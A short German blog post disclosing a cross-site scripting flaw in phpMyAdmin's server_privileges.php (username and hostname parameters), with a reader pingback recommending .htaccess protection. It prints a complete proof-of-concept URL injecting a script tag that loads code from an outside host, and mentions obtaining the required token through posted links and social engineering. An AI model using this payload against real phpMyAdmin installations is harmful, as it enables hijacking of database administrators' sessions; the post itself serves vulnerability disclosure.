Nach etwas testen fiel mir heute die XSS Lücke im phpMyAdmin auf. Nach etwas googeln fand ich heraus das auch schon jemand anders die Lücke entdeckte, selbe Seite, anderer Parameter. Die gleiche Lücke ist nicht nur in der Version 2.11.5.1 vorhanden, nein sogar in der 3.0.0, auch wenn diese noch im developement status ist.
Die Lücke ist allerdings insofern nicht kritisch, da man den “token” benötigt, der in jeder URL mit übergeben wird.
Allerdings posten einige Leute ihre Links samt des Tokens. Noch etwas Social Engineering und man kann die Lücke effektiv ausnutzen. Allerdings “springt” auch nicht jeder dauerhaft mit seinem root Account im phpMyAdmin rum, oder 
Die Lücke befindet sich in der server_privileges.php und betrifft die Parameter username und hostname.
http://pma.cihar.com/STABLE/server_privileges.php?token=[your token here]&username=root&hostname="><script src=//0x.lv></script>&dbname=test&tablename=test#alert("XSS by .the-wildcat.de")
April 15th, 2008 09:59
[...] Wildcat hat eine Lücke in phpMyAdmin (<= 2.11.5.1 & 3.0.0-dev) aufgetan. Wieder mal ein gutes Argument um sein phpMyAdmin-Verzeichnis grundsätzlich per .htaccess zu sichern. Und zwar zusätzlich! [...]